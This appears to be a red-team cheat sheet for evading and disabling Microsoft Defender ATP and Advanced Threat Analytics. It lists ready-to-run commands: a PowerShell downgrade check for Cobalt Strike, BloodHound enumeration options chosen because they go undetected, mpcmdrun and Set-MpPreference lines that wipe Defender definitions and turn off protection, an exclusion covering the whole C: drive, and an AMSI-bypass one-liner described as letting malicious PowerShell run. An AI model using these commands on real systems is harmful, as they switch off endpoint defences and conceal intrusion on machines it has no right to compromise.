Evading, Bypassing, and Disabling MS Advanced Threat Protection and Advanced Threat Analytics
PowerShell Downgrade Check in Cobalt
powershell Invoke-Command -ComputerName <compname> -ScriptBlock {Get-WindowsFeature PowerShell -V2}
https://www.youtube.com/watch?time_continue=1&v=fDs9av_pBaU
https://www.youtube.com/watch?v=2HNuzUuVyv0
Key Sections:
Block All Windows Defender/ATP Comms via FW (Privileged)
Not Detected: Using LDAP/Powerview To Gather Computers/Users
Enumeration via WMI Local Name Space
Not Detected: Session Enumeration By Excluding DC’s (Useful for not flagging if need similar results from BloodHound / UserHunter)
Not Detected: Session Enumeration By Excluding DC’s
Invoke-BloodHound –ExcludeDc
Not Detected: Enumerating AD Access Control Entries
Invoke-BloodHound -CollectionMethod ACL –ExcludeDC
great way to turn off defender and remove previous definitions (set to factory default)
"c:\program files\windows defender\mpcmdrun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
if it comes back to life add the C:\ as an exclusion path so it wont flag anything on C:
Add-MpPreference -ExclusionPath "C:\"
turn off amsi, can run malicious powershell now
"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"